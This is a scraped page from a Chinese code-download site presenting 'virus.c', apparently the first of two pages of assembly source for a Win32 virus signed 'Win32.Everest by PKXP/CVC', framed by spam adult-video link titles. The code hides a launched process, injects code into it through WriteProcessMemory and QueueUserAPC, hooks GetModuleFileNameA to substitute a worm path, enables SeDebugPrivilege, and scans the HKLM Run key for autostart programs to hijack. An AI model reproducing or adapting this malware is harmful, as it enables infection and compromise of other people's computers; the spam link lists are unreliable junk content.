亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? virus.c

?? 一個病毒原代碼,能夠利用其他病毒傳播
?? C
?? 第 1 頁 / 共 2 頁
字號: 
StartVirus      PROC      szVirusPath : DWORD        
       LOCAL   sio       : STARTUPINFO
LOCAL   pi        : PROCESS_INformATION
LOCAL   cbWritten : DWORD

       pushad                 
  push    sizeof(STARTUPINFO)
       lea     eax , sio
       push    eax
       call    RtlZeroMemory
  mov     sio.cb , sizeof STARTUPINFO
  mov     sio.wShowWindow , SW_HIDE
       mov     sio.dwFlags , STARTF_USESHOWWINDOW
                     
       lea     eax , pi
       push    eax
       lea     eax , sio
       push    eax
       push    NULL       
       push    NULL 
       push    CREATE_SUSPENDED
       push    TRUE
       push    NULL 
       push    NULL 
       push    szVirusPath
       push    NULL
       call    CreateProcess
       or      eax , eax
 jzSVExit

       push    3000
       call    Sleep
       
       pushPAGE_EXECUTE_READWRITE 
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push    pi.hProcess
call    VirtualAllocEx 
or      eax , eax
jzSVFail
mov     esi , eax

add     eax , NewGetModuleFileName - RemoteCodeStart
mov     _NewGetModuleFileNameA , eax
      
       lea     eax , cbWritten
       push    eax
       push    RemoteCodeEnd - RemoteCodeStart
       push    offset  RemoteCodeStart
       push    esi       
       push    pi.hProcess
       call    WriteProcessMemory 
       or      eax , eax
jzSVFail

       push    NULL
       push    pi.hThread
       push    esi        
       call    QueueUserAPC
       or      eax , eax
jzSVFail
         
       push    pi.hThread
       call    ResumeThread        
SVFail:
       push    pi.hThread
       call    CloseHandle
       push    pi.hProcess
       call    CloseHandle
SVExit:           
       popad
       ret     4
StartVirus      ENDP

;-----------------------------------------------------------------
RemoteCodeStart:       
       mov      esi , 12345678h
_GetModuleFileNameA   = dword ptr $-4                     
       
       @pushsz  '123'          ;cbWriten         
       push     PAGE_EXECUTE_READWRITE  
       push     6                       ; push & ret
       push     esi
       mov      eax , 12345678h
_VirtualProtect  = dword ptr $-4
       call     eax
     
       @pushsz  '123'         ;cbWriten         
       push     6
       call     RCSJump
       push     12345678h                
_NewGetModuleFileNameA = dword ptr $-4                
       ret
RCSJump:
       push     esi
       push     -1
       mov      eax , 12345678h
_WriteProcessMemory = dword ptr $-4
       call     eax 
       ret      4        

NewGetModuleFileName:
       push     esi
       push     edi
       mov      edi , [esp+16]
       call     _szWormPath
szWormPath       db    MAX_PATH dup (0)
_szWormPath:        
       pop      esi        
       xor      ecx , ecx
RCSLoop:
       lodsb
       stosb
       inc      ecx        
       or       al , al
       jnz      RCSLoop       
       pop      edi
       pop      esi
       mov      eax , ecx
       dec      eax
       ret      12        
RemoteCodeEnd:       

;-----------------------------------------------------------------
GetAPIz:
       @pushsz   'Kernel32.dll'
       call      GetModuleHandle
       xchg      eax,esi             
       
       @pushsz   'GetModuleFileNameA'
       push      esi
       call      GetProcAddress
       mov       _GetModuleFileNameA,eax  
       
       @pushsz   'VirtualProtect'
       push      esi
       call      GetProcAddress
       mov       _VirtualProtect,eax  
       
       @pushsz   'WriteProcessMemory'
       push      esi
       call      GetProcAddress
       mov       _WriteProcessMemory,eax

       @pushsz    'PSAPI'
       call       LoadLibraryA
       xchg       eax,esi

       @pushsz    'EnumProcesses'
       push       esi
       call       GetProcAddress
       mov        _EnumProcesses,eax             
                
       @pushsz    'EnumProcessModules'
       push       esi
       call       GetProcAddress
       mov        _EnumProcessModules,eax                   

       @pushsz    'GetModuleFileNameExA'
       push       esi
       call       GetProcAddress
       mov        _GetModuleFileNameEx,eax                   
       ret        
       
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
       call      GetCurrentProcess
       push      offset p_token
       push      TOKEN_ALL_ACCESS       ;DesiredAccess
       push      eax                        
       call      OpenProcessToken       ;open token of our process    
       or        eax,eax                ;God,I used cmp eax,eax first
       jz        RPExit

       push      offset p_luid    
       @pushsz   'SeDebugPrivilege'
       push      NULL
       call      LookupPrivilegevalueA  ;find LUID for this priv.
       dec       eax
       jne      RPExit
   
       push      0
       call      SetLastError
       push      NULL
       push      NULL
       push      NULL
       push      offset token_priv
       push      FALSE
       push      p_token
       call      AdjustTokenPrivileges
RPExit:    
       ret
       token_priv   dd    1
       p_luid       db    8 dup(0)
                    dd    SE_PRIVILEGE_ENABLED
       p_token      dd    0

;-------------------------------------------------------------------   
ReadRunKey    PROC
       LOCAL    hKey                   : DWORD
       LOCAL    dwIndex                : DWORD        
       LOCAL    szFilePath[MAX_PATH]   : BYTE
       LOCAL    szvalueName[MAX_PATH]  : BYTE
       LOCAL    dwvalueLen             : DWORD
       LOCAL    dwDataLen              : DWORD
       LOCAL    dwType                 : DWORD
       
       pushad                       
       lea      eax , hKey
push     eax
push     KEY_QUERY_value            ;KEY_ALL_ACCESS
push     0
       @pushsz  'Software\Microsoft\Windows\CurrentVersion\Run'       
push     HKEY_LOCAL_MACHINE
call     RegOpenKeyEx
cmp      eax , ERROR_SUCCESS
jnz      RRKExit         

push     0
pop      dwIndex
push     pMem
pop      edi

RRKLoop:              
push     MAX_PATH
 pop      dwDataLen
push     MAX_PATH
pop      dwvalueLen
       lea      eax , dwDataLen
       push     eax        
       lea      esi , szFilePath
       push     esi
       lea      eax , dwType
       push     eax
       push     NULL
       lea      eax , dwvalueLen
       push     eax        
       lea      eax , szvalueName
       push     eax        
       push     dwIndex
       push     hKey
       call     RegEnumvalue
       cmp      eax , ERROR_SUCCESS
       jnz      RRKClose
            
       push     edi        
       mov      edi , esi
       push     edi
       call     lstrlen
       mov      ecx , eax
       mov      al , '\'
       repnz    scasb
       pop      edi
       jz       RRRKReplace
                              
       push     esi
       @pushsz  '\'      
       push     offset szWinPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20       
               
       push     edi
       call     lstrlen        
       add      edi , eax      
       xor      al , al
       stosb
               
       push     esi
       @pushsz  '\'      
       push     offset szSysPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20       
       jmp      RRKNext                
       
RRRKReplace:        
       push     esi         
       call     ReplaceFilePath

       push     esi       
       push     edi
       call     lstrcpy
RRKNext:                         
       push     edi
       call     lstrlen        
       add      edi , eax   
       xor      al , al
       stosb
       inc      dwIndex
       jmp      RRKLoop                
RRKClose:        

       push     hKey
       call     RegCloseKey 
RRKExit:                    
       xor      al , al
       stosb                
       popad               
       ret
ReadRunKey   ENDP

;------------------------------------------------------------------
ReplaceFilePath     PROC   szFilePath  : DWORD
       LOCAL       s[MAX_PATH] : BYTE        
       pushad      
       push     szFilePath
       lea      edi , s
       push     edi
       call     lstrcpy 
IsSysDir:                        
       push     8
       pop      ecx
       @pushsz  '%system%'   ;len=8
       pop      esi
       repz     cmpsb
       jne      IsWinDir
               
       push     offset szSysPath
       push     szFilePath
       call     lstrcpy   
       jmp      RFPCat
IsWinDir:        
       push     8
       pop      ecx
       @pushsz  '%windir%'   ;len=8
       pop      esi
       lea      edi , s    
       repz     cmpsb
       jne      RFPExit
               
       push     offset szWinPath
       push     szFilePath
       call     lstrcpy           
RFPCat:        
       push     edi
       push     szFilePath
       call     lstrcat        
RFPExit:     
       popad
       ret      4
ReplaceFilePath         ENDP           

Signature     db   'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath     db    50  dup (0)
szSysPath     db    50  dup (0)
tmp           dd    ?  
pMem          dd    0

VEnd: 
end main

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
久久电影国产免费久久电影| 亚洲综合色视频| 欧美精品色综合| 欧美日韩一区高清| 欧美性大战久久久久久久| 色噜噜狠狠色综合欧洲selulu| www.av亚洲| 色哟哟国产精品| 欧美日韩一级片网站| 欧美日韩国产经典色站一区二区三区| 欧美视频中文字幕| 欧美日韩一级二级| 91精品国产综合久久久久久| 日韩免费观看2025年上映的电影| 日韩欧美国产一区在线观看| 精品日本一线二线三线不卡| 国产欧美日韩视频一区二区 | 亚洲免费av观看| 亚洲欧美日韩精品久久久久| 一区二区不卡在线播放| 亚洲成在线观看| 美洲天堂一区二卡三卡四卡视频| 理论电影国产精品| 国产.欧美.日韩| 91视频xxxx| 777亚洲妇女| 国产亚洲一本大道中文在线| 亚洲欧美在线观看| 亚洲v日本v欧美v久久精品| 久久成人精品无人区| 成人丝袜视频网| 欧美年轻男男videosbes| 26uuu亚洲| 亚洲激情在线激情| 久久精品久久99精品久久| 国产精品综合二区| 欧美在线免费观看视频| 久久久综合激的五月天| 亚洲精品日韩一| 狠狠色狠狠色综合系列| 在线一区二区观看| 久久久久久久久免费| 一区二区三区在线观看动漫 | 91精品国产综合久久久久久久| 精品福利在线导航| 亚洲免费观看高清完整版在线| 麻豆成人av在线| 在线观看免费视频综合| 国产欧美日产一区| 久草精品在线观看| 欧美熟乱第一页| 亚洲色欲色欲www| 国内精品久久久久影院一蜜桃| 在线欧美日韩国产| www亚洲一区| 日韩精品一卡二卡三卡四卡无卡| 成人午夜激情视频| 日韩欧美国产三级电影视频| 一区二区三区在线视频播放| eeuss鲁片一区二区三区在线观看 eeuss鲁片一区二区三区在线看 | 五月天久久比比资源色| 成人v精品蜜桃久久一区| 欧美成人a∨高清免费观看| 亚洲欧美影音先锋| 精品一区二区三区免费观看| 欧美日韩精品二区第二页| 亚洲婷婷在线视频| 波多野结衣亚洲一区| 国产日韩av一区二区| 99re热这里只有精品视频| 日韩一级完整毛片| 图片区小说区国产精品视频| 99久久精品国产精品久久| 国产婷婷色一区二区三区四区| 久久国产三级精品| 日韩一区二区在线观看| 免费在线观看精品| 欧美妇女性影城| 亚洲动漫第一页| 在线观看国产日韩| 亚洲成人免费看| 欧美另类一区二区三区| 性做久久久久久免费观看 | 日韩久久久精品| 日韩电影网1区2区| 日韩一级视频免费观看在线| 精品影视av免费| 欧美国产日韩精品免费观看| 懂色av一区二区三区免费观看 | 色悠悠久久综合| 玉足女爽爽91| 678五月天丁香亚洲综合网| 热久久久久久久| 国产丝袜在线精品| 99久久夜色精品国产网站| 一区二区三区在线免费播放 | 激情伊人五月天久久综合| 久久奇米777| 成人黄色网址在线观看| 一区二区三区日韩在线观看| 欧美性色黄大片| 免费观看在线色综合| 国产亚洲一区二区三区| 一本色道亚洲精品aⅴ| 午夜激情一区二区| 久久精品亚洲精品国产欧美| 91小视频免费观看| 麻豆成人免费电影| 国产精品视频线看| 在线观看亚洲一区| 看国产成人h片视频| 国产精品久久久久影院色老大 | 欧美va在线播放| 成人a免费在线看| 视频一区视频二区中文字幕| 欧美激情一区二区三区四区| 欧美性大战久久久久久久| 国产麻豆视频精品| 亚洲韩国一区二区三区| 久久久国产综合精品女国产盗摄| 91激情五月电影| 国产在线不卡一区| 亚洲1区2区3区视频| 国产欧美一区二区在线观看| 欧美电影在线免费观看| 成人免费不卡视频| 蜜桃视频在线观看一区| 亚洲最新视频在线观看| 欧美国产精品一区二区三区| 欧美一区二区在线看| 99在线精品一区二区三区| 韩国av一区二区| 日韩国产一区二| 亚洲精品国产a| 国产精品免费视频网站| 亚洲精品一区二区三区精华液| 在线观看亚洲精品视频| 国产91高潮流白浆在线麻豆 | 亚洲激情自拍视频| 欧美国产精品v| 2020国产成人综合网| 日韩欧美国产系列| 欧美日韩综合一区| 在线视频欧美精品| 91社区在线播放| 91视频在线看| 色婷婷av一区二区三区大白胸| 粉嫩绯色av一区二区在线观看| 九九视频精品免费| 九一久久久久久| 国产精品一线二线三线精华| 六月婷婷色综合| 美国十次综合导航| 久久99精品一区二区三区三区| 日本在线不卡视频| 日韩高清一级片| 男人的天堂久久精品| 美女视频免费一区| 国产一区高清在线| 国产精品系列在线播放| 国产成人免费在线观看| 成人晚上爱看视频| av在线不卡免费看| 97久久久精品综合88久久| 一本久道久久综合中文字幕| 欧美自拍偷拍一区| 91精品在线一区二区| 精品国产伦一区二区三区免费| 久久一留热品黄| **欧美大码日韩| 亚洲一区二区3| 麻豆精品在线播放| 丁香亚洲综合激情啪啪综合| www.色精品| 精品少妇一区二区三区在线播放| 久久综合中文字幕| 国产精品日韩精品欧美在线| 亚洲欧美一区二区在线观看| 天天爽夜夜爽夜夜爽精品视频| 国产日韩欧美一区二区三区乱码| 亚洲欧洲日韩综合一区二区| 一区二区三区精品久久久| 国产精品看片你懂得| 中文字幕欧美一区| 亚洲一区二区不卡免费| 欧美电影精品一区二区| 中文字幕乱码一区二区免费| 亚洲精品菠萝久久久久久久| 日韩**一区毛片| 成人午夜视频免费看| 欧美亚洲日本一区| 欧美精品一区二区三区高清aⅴ| 亚洲青青青在线视频| 麻豆国产精品视频| 91亚洲国产成人精品一区二三| 欧美岛国在线观看| 亚洲人成网站色在线观看| 精品一区二区三区av| 91精彩视频在线观看| 国产免费观看久久|